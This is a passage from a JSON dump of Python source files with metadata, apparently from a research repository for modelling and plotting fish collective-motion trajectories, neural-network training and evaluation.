ax2.text(-0.2, 1.07, r'$\\mathbf{C}$',\n fontsize=25, transform=ax2.transAxes)\n ax3.text(-0.2, 1.07, r'$\\mathbf{D}$',\n fontsize=25, transform=ax3.transAxes)\n ax4.text(-0.2, 1.07, r'$\\mathbf{E}$',\n fontsize=25, transform=ax4.transAxes)\n\n ax0.set_ylabel('y (m)')\n ax0.set_xlabel('x (m)')\n ax1.get_xaxis().set_ticklabels([])\n ax1.get_yaxis().set_ticklabels([])\n ax2.get_xaxis().set_ticklabels([])\n ax2.get_yaxis().set_ticklabels([])\n ax3.get_xaxis().set_ticklabels([])\n ax3.get_yaxis().set_ticklabels([])\n ax4.get_xaxis().set_ticklabels([])\n ax4.get_yaxis().set_ticklabels([])\n ax_cbar.get_xaxis().set_ticks([])\n ax_cbar.get_yaxis().set_ticks([])\n ax_cbar.axis('off')\n ax_cbar.set_visible(False)\n\n ax0.grid(linestyle='dotted')\n ax1.grid(linestyle='dotted')\n ax2.grid(linestyle='dotted')\n ax3.grid(linestyle='dotted')\n ax4.grid(linestyle='dotted')\n\n plt.tight_layout()\n plt.savefig(path + 'occupancy_maps.png', bbox_inches='tight')\n\n args.grid_cutoff_val = orig_cutoff # resetting this\n"
},
{
"alpha_fraction": 0.5029211044311523,
"alphanum_fraction": 0.5108730792999268,
"avg_line_length": 38.248409271240234,
"blob_id": "5979074e3afdb0209a13ccf2591e96998727feae",
"content_id": "c62157332d6d3c9d78bc7a8a0888fe19fa7e3841",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6162,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 157,
"path": "/find/plots/spatial/resultant_velocity.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.utils.features import Velocities\nfrom find.utils.utils import compute_leadership\nfrom find.plots.common import *\n\nfrom scipy.stats import norm, rv_histogram\n\n\ndef compute_resultant_velocity(data, ax, args, clipping_range=[0.0, 0.6]):\n lines = ['--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n new_palette *= 3\n ccycler = cycle(sns.color_palette(new_palette))\n\n leadership = {}\n for k in sorted(data.keys()):\n p = data[k]['pos']\n v = data[k]['vel']\n leadership[k] = []\n for idx in range(len(p)):\n (_, leadership_timeseries) = compute_leadership(p[idx], v[idx])\n leadership[k].append(leadership_timeseries)\n\n labels = []\n for k in sorted(data.keys()):\n labels.append(k)\n leaders = leadership[k]\n rvel = data[k]['rvel']\n leader_dist = []\n follower_dist = []\n\n for idx in range(len(rvel)):\n leadership_mat = np.array(leaders[idx])\n num_individuals = rvel[idx].shape[1]\n for j in range(num_individuals):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n leader_dist += rvel[idx][idx_leaders, j].tolist()[0]\n follower_idcs = list(range(num_individuals))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += rvel[idx][idx_leaders, fidx].tolist()[0]\n\n ls = next(linecycler)\n print('Velocities', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n print('L: ', np.mean(leader_dist),\n np.std(leader_dist))\n print('F: ', np.mean(follower_dist),\n np.std(follower_dist))\n\n ccolour = next(ccycler)\n # ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=ccolour,\n # linestyle'-', label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.5, cut=-1)\n ax = sns.kdeplot(leader_dist, ax=ax, color=ccolour,\n linestyle='--', label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.6, cut=-1)\n ax = sns.kdeplot(follower_dist, ax=ax, color=ccolour,\n linestyle=':', label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.6, cut=-1)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n data[e]['rvel'] = []\n for p in pos:\n if e == 'Virtual (Toulouse)':\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n elif e == 'Virtual (Toulouse cpp)':\n positions = np.loadtxt(p)[:, 2:] * args.radius\n else:\n positions = np.loadtxt(p) * args.radius\n velocities = Velocities([positions], args.timestep).get()[0]\n linear_velocity = np.array((velocities.shape[0], 1))\n tup = []\n for i in range(velocities.shape[1] // 2):\n linear_velocity = np.sqrt(\n velocities[:, i * 2] ** 2 + velocities[:, i * 2 + 1] ** 2).tolist()\n tup.append(linear_velocity)\n data[e]['rvel'].append(np.array(tup).T)\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n ax = compute_resultant_velocity(data, ax, args, [0, 41])\n\n ax.set_xlabel('$V$ (cm/s)')\n ax.set_ylabel('PDF')\n # ax.set_xlim([-0.02, 0.6])\n ax.legend()\n plt.savefig(path + 'linear_velocity.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Resultant velocity histogram figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--timestep', '-t', type=float,\n help='Timestep',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Raidus',\n default=0.25,\n required=False)\n parser.add_argument('--kde_gridsize',\n type=int,\n help='Grid size for kernel density estimation plots',\n default=1500,\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.7412587404251099,
"alphanum_fraction": 0.7552447319030762,
"avg_line_length": 34.75,
"blob_id": "7fb0fa5a58ee2c610d90538fa3bc5103f7905751",
"content_id": "a06af64789e9e933b46c3b2e599b15d2f3c18c64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 4,
"path": "/find/simulation/simu/setup.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom setuptools import setup, find_packages\n\nsetup(name='python_particle_simu', version='0.1', packages=find_packages())\n"
},
{
"alpha_fraction": 0.5725958347320557,
"alphanum_fraction": 0.6040226221084595,
"avg_line_length": 32.14583206176758,
"blob_id": "144a84d8ea49aa559c828c422acfd03924871b40",
"content_id": "ed8442ae9022f69ef6f482033f504aa09e84e18b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1591,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 48,
"path": "/find/plots/physiological/plot_kicks.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport os\nimport sys\nimport glob\nimport argparse\nimport numpy as np\nfrom pathlib import Path\n\nimport scipy.signal as signal\nimport matplotlib.pyplot as plt\n\nfrom find.utils.features import Velocities\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Preprocess fish trajectories')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--output', '-o', type=str,\n help='Filename for the output file',\n required=True)\n args = parser.parse_args()\n\n positions = np.loadtxt(args.path) * 0.25\n velocities = Velocities([positions], 1.0/25).get()[0][1000:1150]\n\n fig = plt.figure(figsize=(6, 2))\n ax = plt.gca()\n\n rvelocities = []\n for i in range(velocities.shape[0]):\n r = np.sqrt(velocities[i, 1] ** 2 +\n velocities[i, 0] ** 2 -\n 2 * np.abs(velocities[i, 1]) * np.abs(velocities[i, 0]) * np.cos(np.arctan2(velocities[i, 1], velocities[i, 0])))\n rvelocities.append(r)\n rvelocities = np.array(rvelocities)\n\n peaks = signal.find_peaks_cwt(rvelocities, np.arange(0.1, 0.3))\n valleys = signal.find_peaks_cwt(1 / rvelocities, np.arange(0.1, 0.3))\n\n print('Num peaks: ', len(peaks))\n\n ax.set_xticks(np.arange(0, len(rvelocities) + 1, 25))\n\n plt.plot(rvelocities, linewidth=0.07)\n # plt.plot(valleys, rvelocities[valleys], 'o', markersize=0.4)\n plt.savefig(args.output + '.png', dpi=300)\n"
},
{
"alpha_fraction": 0.5359463095664978,
"alphanum_fraction": 0.5686444640159607,
"avg_line_length": 30.630136489868164,
"blob_id": "c241b4869718c4c79e0129d53f531dc73d0333f5",
"content_id": "ce54e13280db1f48ed97db0d5eff8ab71fc6367a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4618,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 146,
"path": "/examples/gaussian_nll_example.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom find.models.tf_losses import *\nimport argparse\nimport sys\n\nimport matplotlib.lines as mlines\nimport seaborn as sns\nimport tensorflow as tf\nfrom pylab import *\n\nsys.path.append('.')\n\nflatui = [\"#9b59b6\", \"#3498db\", \"#95a5a6\", \"#e74c3c\", \"#34495e\", \"#2ecc71\"]\npalette = flatui\n# palette = 'Paired'\n# palette = \"husl\"\ncolors = sns.color_palette(palette)\nsns.set(style=\"darkgrid\")\n\ngfontsize = 10\nparams = {\n 'axes.labelsize': gfontsize,\n 'font.size': gfontsize,\n 'legend.fontsize': gfontsize,\n 'xtick.labelsize': gfontsize,\n 'ytick.labelsize': gfontsize,\n 'text.usetex': False,\n # 'figure.figsize': [10, 15]\n # 'ytick.major.pad': 4,\n # 'xtick.major.pad': 4,\n 'font.family': 'Arial',\n}\nrcParams.update(params)\n\npts = np.linspace(0, np.pi * 2, 24)\ncirc = np.c_[np.sin(pts) / 2, -np.cos(pts) / 2]\nvert = np.r_[circ, circ[::-1] * 1.0]\nopen_circle = mpl.path.Path(vert)\n\nextra = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False,\n edgecolor='none', linewidth=0)\nshapeList = [\n Circle((0, 0), radius=1, facecolor=colors[0]),\n Circle((0, 0), radius=1, facecolor=colors[1]),\n Circle((0, 0), radius=1, facecolor=colors[2]),\n # Circle((0, 0), radius=1, facecolor=colors[3]),\n # Circle((0, 0), radius=1, facecolor=colors[4]),\n # Circle((0, 0), radius=1, facecolor=colors[5]),\n]\n\nv = np.r_[circ, circ[::-1] * 0.6]\noc = mpl.path.Path(v)\n\nhandles_a = [\n mlines.Line2D([0], [0], color='black', marker=oc,\n markersize=6, label='Mean and SD'),\n mlines.Line2D([], [], linestyle='none', color='black', marker='*',\n markersize=5, label='Median'),\n mlines.Line2D([], [], linestyle='none', markeredgewidth=1, marker='o',\n color='black', markeredgecolor='w', markerfacecolor='black', alpha=0.5,\n markersize=5, label='Single run')\n]\nhandles_b = [\n mlines.Line2D([0], [1], color='black', label='Mean'),\n Circle((0, 0), radius=1, facecolor='black', alpha=0.35, label='SD')\n]\n\n\ndef pplots(data, ax, sub_colors=[], exp_title='', ticks=False):\n paper_rc = {'lines.linewidth': 1, 'lines.markersize': 10}\n sns.set_context(\"paper\", rc=paper_rc)\n\n sns.pointplot(data=np.transpose(data), palette=sub_colors,\n size=5, estimator=np.mean,\n ci='sd', capsize=0.2, linewidth=0.8, markers=[open_circle],\n scale=1.6, ax=ax)\n\n sns.stripplot(data=np.transpose(data), edgecolor='white',\n dodge=True, jitter=True,\n alpha=.50, linewidth=0.8, size=5, palette=sub_colors, ax=ax)\n\n medians = []\n for d in data:\n medians.append([np.median(list(d))])\n sns.swarmplot(data=medians, palette=['#000000'] * 10,\n marker='*', size=5, ax=ax)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Dense model to reproduce fish motion')\n parser.add_argument('--epochs', '-e', type=int,\n help='Number of training epochs',\n default=10000)\n parser.add_argument('--batch_size', '-b', type=int,\n help='Batch size',\n default=256)\n args = parser.parse_args()\n\n X = np.random.rand(200, 1) * 5\n Y = np.cos(X)\n\n split_at = X.shape[0] - X.shape[0] // 10\n (x_train, x_val) = X[:split_at, :], X[split_at:, :]\n (y_train, y_val) = Y[:split_at, :], Y[split_at:, :]\n\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Flatten(input_shape=(x_train.shape[1],)))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(Y.shape[1] * 2, activation=None))\n\n loss = gaussian_nll\n optimizer = tf.keras.optimizers.Adam(0.0001)\n model.compile(loss=loss,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n model.summary()\n\n for epoch in range(args.epochs):\n model.fit(x_train, y_train,\n batch_size=args.batch_size,\n epochs=epoch + 1,\n initial_epoch=epoch,\n validation_data=(x_val, y_val),\n verbose=1)\n\n model.save('cos_model.h5')\n\n sigmas = []\n for i in range(X.shape[0]):\n p = model.predict(X[i])\n sigmas.append(np.exp(p[0, 1]))\n\n np.savetxt('cos_sigmas.dat', np.array(sigmas))\n\n plt.figure()\n plt.plot(sigmas)\n plt.legend(labels=['sigma'])\n plt.show()\n\n plt.figure()\n plt.plot(Y[:, 0])\n plt.plot(np.array(model.predict(X))[:, 0])\n plt.legend(labels=['real', 'predicted'])\n plt.show()\n"
},
{
"alpha_fraction": 0.40397706627845764,
"alphanum_fraction": 0.44070225954055786,
"avg_line_length": 33.88750076293945,
"blob_id": "fc800f15af6a22dd9c2466f16e065684056d099b",
"content_id": "cbfa14c241986093fe742af1e09c1b192f9b2222",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5582,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 160,
"path": "/find/plots/dl_si_2021/nn_plots.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.plots.common import *\nimport find.plots.common as shared\n\nimport find.plots.nn.training_history as th\nimport find.plots.nn.parameters_to_epoch as pte\n\n\ndef plot(exp_files, path, args):\n history_files = []\n for d in args.nn_compare_dirs:\n history_files.append(glob.glob(d + '/logs/history.csv'))\n\n _, ax = plt.subplots(figsize=(10, 10),\n nrows=6, ncols=len(history_files),\n gridspec_kw={'width_ratios': [\n 1] * len(history_files), 'wspace': 1.4, 'hspace': 1.2}\n )\n\n config = {\n 'gaussian_mae': {\n 'title': 'Mean Absolute error\\n (training)',\n 'limy': (0.02, 0.14, 0.03),\n 'limx': (0, 15000, 3000),\n\n },\n 'gaussian_mse': {\n 'title': 'Mean Squared error\\n (training)',\n 'limy': (0.0025, 0.035, 0.01),\n 'limx': (0, 15000, 3000),\n\n },\n 'loss': {\n 'title': 'Loss\\n (training)',\n 'limy': (-6.5, 4, 2),\n 'limx': (0, 15000, 3000),\n\n },\n 'val_gaussian_mae': {\n 'title': 'Mean Absolute error\\n (validation)',\n 'limy': (0.02, 0.14, 0.03),\n 'limx': (0, 15000, 3000),\n\n },\n 'val_gaussian_mse': {\n 'title': 'Mean Squared error\\n (validation)',\n 'limy': (0.0025, 0.035, 0.01),\n 'limx': (0, 15000, 3000),\n\n },\n 'val_loss': {\n 'title': 'Loss\\n (validation)',\n 'limy': (-3.5, 6, 2),\n 'limx': (0, 15000, 3000),\n\n },\n 'cax_lstm': 1.1,\n 'cax_pfw': 1.1,\n }\n\n for hf_idx, hf in enumerate(history_files):\n plot_dict = th.prepare_plot_history(hf, path, args)\n\n for it, (k, v) in enumerate(sorted(plot_dict.items())):\n if len(hf) > 1:\n cax = ax[it, hf_idx]\n else:\n cax = ax[it]\n palette = sns.color_palette(\n 'Spectral', n_colors=len(v))\n ccycler = cycle(palette)\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n\n for label, x, y in v:\n sns.lineplot(x=x, y=y, ax=cax, label=label,\n linewidth=uni_linewidth, color=next(ccycler), linestyle=next(linecycler))\n cax.legend().remove()\n cax.set_xlabel('Epochs')\n cax.set_ylabel(config[k]['title'])\n\n cax.set_yticks(np.arange(\n config[k]['limy'][0], config[k]['limy'][1] + 0.0001, config[k]['limy'][2]))\n cax.set_ylim(config[k]['limy'][0], config[k]['limy'][1] + 0.0001)\n cax.set_xticks(np.arange(\n config[k]['limx'][0], config[k]['limx'][1] + 0.0001, config[k]['limx'][2]))\n cax.set_xlim(config[k]['limx'][0], config[k]['limx'][1] + 0.0001)\n cax.tick_params(axis='x', rotation=45)\n\n if it == 0:\n if 'pfw' in hf:\n offset = config['cax_pfw']\n print('ok')\n else:\n offset = config['cax_lstm']\n cax.legend(bbox_to_anchor=(\n offset, 1.0), bbox_transform=cax.transAxes, prop={'size': 4})\n\n plt.savefig(path + '/nn_th_eval.png', bbox_inches=\"tight\")\n\n # _, ax = plt.subplots(figsize=(11, 8),\n # nrows=2, ncols=len(history_files),\n # gridspec_kw={'width_ratios': [\n # 1] * len(history_files), 'wspace': 1.0, 'hspace': 0.25}\n # )\n\n # for hf_idx, hf in enumerate(history_files):\n # plot_dict = pte.plot_params_to_epoch(hf, path, args)\n\n # row_select = 0\n # for it, (k, v) in enumerate(sorted(plot_dict.items())):\n # if 'loss' not in k:\n # continue\n\n # if len(hf) > 1:\n # cax = ax[row_select, hf_idx]\n # else:\n # cax = ax[it]\n # palette = sns.color_palette(\n # 'Spectral', n_colors=len(hf))\n # ccycler = cycle(palette)\n\n # if k == 'num_params':\n # continue\n\n # xs = []\n # ys = []\n # zs = []\n # labels = []\n # for idx, (label, x, y) in enumerate(v):\n # xs.append(plot_dict['num_params'][idx])\n # ys.append(y[-1])\n # zs.append(x[-1])\n # labels.append(label)\n # zs = np.array(zs) / np.max(zs) * 6\n\n # for idx in range(len(xs)):\n # cax.plot(xs[idx], ys[idx], 'o', markersize=zs[idx],\n # label=labels[idx], color=next(ccycler))\n\n # cax.set_xlabel('Number of parameters')\n # cax.set_ylabel(k)\n # cax.ticklabel_format(axis='x', style='sci', scilimits=(0, 0))\n # cax.set_yticks(np.arange(\n # config['loss']['limy'][0], config['loss']['limy'][1] + 0.0001, config['loss']['limy'][2]))\n # cax.set_ylim(config['loss']['limy'][0],\n # config['loss']['limy'][1] + 0.0001)\n\n # if row_select == 0:\n # cax.legend(\n # prop={'size': 4}, fontsize='x-small',\n # bbox_to_anchor=(1.65, 1.0), borderaxespad=0,\n # labelspacing=2.5,\n # ncol=1)\n # row_select += 1\n\n # plt.savefig(path + '/nn_pte_eval.png', bbox_inches=\"tight\")\n"
},
{
"alpha_fraction": 0.7861635088920593,
"alphanum_fraction": 0.7861635088920593,
"avg_line_length": 29.285715103149414,
"blob_id": "fed96dae7a9be8cfc51a850475c7ed25d2c069ee",
"content_id": "fde90832c33822feee0d2bea2b422ea67bde6778",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 636,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 21,
"path": "/find/plots/correlation/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.plots.correlation import position_correlation\nfrom find.plots.correlation import velocity_correlation\nfrom find.plots.correlation import relative_orientation_correlation\nfrom find.plots.correlation import leadership_distribution\n\nplot_dict = {\n 'position_correlation': position_correlation.plot,\n 'velocity_correlation': velocity_correlation.plot,\n 'relative_orientation_correlation': relative_orientation_correlation.plot,\n 'leadership_distribution': leadership_distribution.plot,\n}\n\nsource = 'correlation'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.47920677065849304,
"alphanum_fraction": 0.4890258014202118,
"avg_line_length": 34.57534408569336,
"blob_id": "9e108f980ae6a8dc4000a1a7e9f90e16e45132b1",
"content_id": "14d7624cc85df26d08f4c502d86fed38518b3ba5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5194,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 146,
"path": "/find/plots/correlation/leadership_distribution.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\nfrom itertools import groupby\nfrom operator import itemgetter\n\nfrom find.utils.utils import angle_to_pipi, compute_leadership\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\n\n\ndef plot_distribution(data, ax, args):\n # lines = ['-', '--', ':']\n linecycler = cycle(uni_lines)\n new_palette = uni_palette()\n # for p in uni_palette():\n # new_palette.extend([p, p, p])\n ccycler = cycle(sns.color_palette(new_palette))\n\n sample_count = {}\n leadership = {}\n for k in sorted(data.keys()):\n sample_count[k] = 0\n pos = data[k]['pos']\n vel = data[k]['vel']\n leadership[k] = []\n for idx in range(len(pos)):\n sample_count[k] += pos[idx].shape[0]\n (_, leadership_timeseries) = compute_leadership(pos[idx], vel[idx])\n leadership[k].append(leadership_timeseries)\n\n for kidx, k in enumerate(sorted(data.keys())):\n leaders = leadership[k]\n\n occurences = {}\n for e in range(len(data[k]['pos'])):\n lts = np.array(leaders[e])[:, 1].tolist()\n\n cons_count = 1\n for i in range(len(lts) - 1):\n if lts[i] != lts[i+1]:\n if cons_count not in occurences.keys():\n occurences[cons_count] = 1.\n else:\n occurences[cons_count] += 1.\n cons_count = 1\n else:\n cons_count += 1\n\n dist = np.array([list(occurences.keys()), list(occurences.values())]).T\n\n print(np.mean(dist[:, 0]) * args.timestep, k)\n col = next(ccycler)\n ax = sns.kdeplot(dist[:, 1], ax=ax, color=col,\n linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize,\n clip=[0, 500],\n bw_adjust=.2\n )\n\n # ticks = np.arange(0, 501, 50)\n # ax.set_xticks(ticks)\n # time = ticks * args.timestep\n # ax.set_xticklabels(time)\n # ax.axvline(np.mean(dist[:, 0]), color=col, linestyle='dashed')\n # ax.text(np.mean(dist[:, 0]) * 1.1, 0.018 - kidx * 0.003,\n # 'Mean: {:.2f}'.format(np.mean(dist[:, 0]) * args.timestep), color=col)\n # ax.set_xlim([-0.1, 500])\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {'pos': [], 'vel': []}\n for p in pos:\n if e == 'Virtual (Toulouse)':\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n p = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n f.close()\n else:\n p = np.loadtxt(p) * args.radius\n v = Velocities([p], args.timestep).get()[0]\n data[e]['pos'].append(p)\n data[e]['vel'].append(v)\n\n # relative angle to neigh\n _ = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n\n ax = plot_distribution(data, ax, args)\n\n ax.set_xlabel(r'$t$ (s)')\n ax.set_ylabel('PDF')\n ax.legend()\n plt.savefig(path + 'leadership_distribution.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Relative orientation figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.5171722769737244,
"alphanum_fraction": 0.5208929777145386,
"avg_line_length": 43.79487228393555,
"blob_id": "fb85a352350e3afa1b4d919f7a3455f1df44664f",
"content_id": "014c05c1b5fed6eac3be69859418f8f483c887c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3494,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 78,
"path": "/find/models/convert.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport argparse\n\nfrom find.models.loader import Loader\nfrom find.models.storage import ModelStorage\nfrom find.models.model_factory import ModelFactory, available_models\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Data converter')\n parser.add_argument('--files', '-f',\n type=str,\n help='Files to look for',\n default='processed_positions.dat',\n required=False)\n parser.add_argument('--path', '-p',\n type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--timestep', '-t',\n type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--timesteps_skip',\n type=int,\n help='Timesteps skipped between input and prediction',\n default=0,\n required=False)\n\n # model selection arguments\n model_selection = parser.add_argument_group('Model selection')\n model_selection.add_argument('--model',\n default=available_models()[0],\n choices=available_models())\n\n # model options\n model_options = parser.add_argument_group('Model options')\n model_options.add_argument('--polar', action='store_true',\n help='Use polar inputs instead of cartesian coordinates',\n default=False)\n model_options.add_argument('--prediction_steps', type=int,\n help='Trajectory steps to predict',\n default=1)\n model_options.add_argument('--num_timesteps', type=int,\n help='Number of LSTM timesteps',\n default=5)\n model_options.add_argument('--distance_inputs', action='store_true',\n help='Use distance data as additional NN inputs',\n default=False)\n\n # data split\n data_split_options = parser.add_argument_group('Data split options')\n data_split_options.add_argument('--train_fraction',\n type=float,\n help='Validation set fraction',\n default=0.85)\n data_split_options.add_argument('--val_fraction',\n type=float,\n help='Validation set fraction',\n default=0.13)\n data_split_options.add_argument('--test_fraction',\n type=float,\n help='Test set fraction',\n default=0.02)\n args = parser.parse_args()\n\n # data loading is handled here depending on the number of individuals\n # the loader will also handle the data splitting process according\n # to the arguments provided\n loader = Loader(path=args.path)\n pos, files = loader.load(args.files)\n inputs, outputs = loader.prepare(pos, args)\n td, tv, tt = loader.split_to_sets(inputs, outputs, args)\n\n # model storage instance to tidy up the directory and take care of saving/loading\n model_storage = ModelStorage(args.path)\n model_storage.save_sets(td, tv, tt)\n"
},
{
"alpha_fraction": 0.5153452754020691,
"alphanum_fraction": 0.5238704085350037,
"avg_line_length": 34.56060791015625,
"blob_id": "d5150b6b41f580163f48fc5f004f26c03d26e7cf",
"content_id": "d9383918b9a25a0bcb4819a12891635108842f0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2346,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 66,
"path": "/find/models/test.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport pickle\nimport argparse\nimport numpy as np\nfrom glob import glob\nimport functools\n\nfrom find.models.storage import ModelStorage\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Generate test results')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--backend',\n help='Backend selection',\n default='keras',\n choices=['keras', 'trajnet'])\n args = parser.parse_args()\n\n print('Using {} backend'.format(args.backend))\n if args.backend == 'keras':\n from tensorflow.keras.callbacks import CSVLogger\n models = glob('{}/model_checkpoint/model_*.h5'.format(args.path))\n model_storage = ModelStorage(args.path)\n\n def compare(item1, item2):\n if int(item1.split('_')[-1].split('.')[0]) < int(item2.split('_')[-1].split('.')[0]):\n return -1\n elif int(item1.split('_')[-1].split('.')[0]) > int(item2.split('_')[-1].split('.')[0]):\n return 1\n else: \n return 0\n\n models.sort(key=functools.cmp_to_key(compare))\n\n epochs = []\n measurements = []\n mnames = ''\n for model_path in models:\n model = model_storage.load_model(\n model_path, args.backend, args)\n\n f = open('{}/test/test_inputs.pkl'.format(args.path),'rb')\n X_test = pickle.load(f)\n f.close()\n \n f = open('{}/test/test_outputs.pkl'.format(args.path),'rb')\n Y_test = pickle.load(f)\n f.close()\n\n h = model.evaluate(x=X_test, y=Y_test,verbose=False)\n epochs.append(int(model_path.split('_')[-1].split('.')[0]))\n measurements.append(h)\n mnames = model.metrics_names\n measurements = np.array(measurements)\n\n f = open('{}/test/history.csv'.format(args.path), 'w')\n header = 'epochs,' + ','.join(str(x) for x in mnames)\n f.write('{}\\n'.format(header))\n for e, data in enumerate(measurements):\n row_str = ','.join(str(x) for x in data)\n f.write('{},{}\\n'.format(epochs[e], row_str))\n f.close()"
},
{
